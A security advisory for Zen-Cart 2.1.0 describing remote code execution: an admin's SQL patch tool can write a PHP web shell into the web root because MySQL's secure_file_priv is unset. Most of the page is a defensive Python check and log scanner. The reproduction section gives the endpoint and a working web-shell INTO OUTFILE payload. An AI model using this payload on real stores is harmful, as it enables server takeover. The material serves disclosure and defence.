Zencart | RCE via SQL query executor file upload
Information
| Software Type | Web App |
|---|---|
| Software Name | Zen-Cart |
| Affected Version | 2.1.0 |
| Software Vendor | Zen Ventures, LLC |
| Software Link | https://github.com/zencart/zencart |
| Severity | High |
| CVSS Score | 8.7 |
| CVE Link | N/A |
| Affected Assets | 30171+ |
| Date of Discovery | Jan 9th, 2025 |
| PoC Exploit | https://gist.github.com/0xHamy/1d114a5b745c7fbca96d292199edf034 |
Description
The [/zencart/Horse-Kgc-fRizz/index.php?cmd=sqlpatch] endpoint allows admins to run SQL queries. This feature was created to let developers manually configure or modify the database, but it has a problem: it also allows an authenticated admin to write files, including PHP shells, into the web root and then access them, which results in RCE. This is possible because MySQL's secure_file_priv is not set, so INTO OUTFILE is not restricted to a safe directory, creating a critical security issue.
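Because the root cause is the secure_file_priv setting, a defender can verify it on the database server and watch the admin SQL tool's queries for file-write clauses. The following is an added example, not code from this advisory or from the Zen-Cart project: it classifies the value returned by `SHOW VARIABLES LIKE 'secure_file_priv'`, checks whether that value would let a query write into an assumed web root, and scans constructed MySQL general-log lines for INTO OUTFILE / INTO DUMPFILE.

```python
import re
from typing import List, Optional, Tuple

# MySQL clauses that write query results to a server-side file.
# The advisory's payload uses INTO OUTFILE; INTO DUMPFILE is the raw-bytes form.
FILE_WRITE_RE = re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\b", re.IGNORECASE)


def classify_secure_file_priv(value: Optional[str]) -> str:
    """Interpret the value of SHOW VARIABLES LIKE 'secure_file_priv'.

    None -> server reports NULL: file import/export is disabled (hardened).
    ''   -> empty string: no restriction, the state described in the advisory.
    path -> writes are limited to that directory.
    """
    if value is None:
        return "disabled"
    if value.strip() == "":
        return "unrestricted"
    return "restricted"


def web_root_writable(value: Optional[str], web_root: str) -> bool:
    """True if secure_file_priv alone would not stop a write into web_root.

    OS permissions of the mysqld user and the FILE privilege still apply;
    this only evaluates the server setting.
    """
    state = classify_secure_file_priv(value)
    if state == "disabled":
        return False
    if state == "unrestricted":
        return True
    priv_dir = value.rstrip("/") + "/"  # normalise trailing slash for prefix test
    return (web_root.rstrip("/") + "/").startswith(priv_dir)


def find_file_writes(log_lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, query) for general-log 'Query' entries that contain a
    file-write clause. Format assumed: '<time>\\t<thread_id> Query\\t<sql>'."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r"\s+Query\t(.*)$", line)
        if m and FILE_WRITE_RE.search(m.group(1)):
            hits.append((n, m.group(1)))
    return hits


# Constructed sample general-log lines for illustration (not real captures).
SAMPLE_LOG = [
    "2025-01-09T10:00:01.000000Z\t   12 Query\tSELECT * FROM zen_configuration LIMIT 1",
    "2025-01-09T10:00:02.000000Z\t   12 Query\tSELECT 'x' INTO OUTFILE '/var/www/html/zencart/shell.php'",
    "2025-01-09T10:00:03.000000Z\t   12 Query\tUPDATE zen_configuration SET configuration_value='1'",
]
```

Run the log scan periodically against the MySQL general log (or the admin tool's own query log) and alert on any hit; a restricted or NULL secure_file_priv closes the file-write path described above.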
Reproduce
Go to the following endpoint:
/zencart/Horse-Kgc-fRizz/index.php?cmd=sqlpatch
Use the following SQL command to upload a shell to the zencart directory:
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/zencart/shell.php';
Access the shell:
Proof of Concept (PoC) Video
Posted on: May 24, 2025 06:03 AM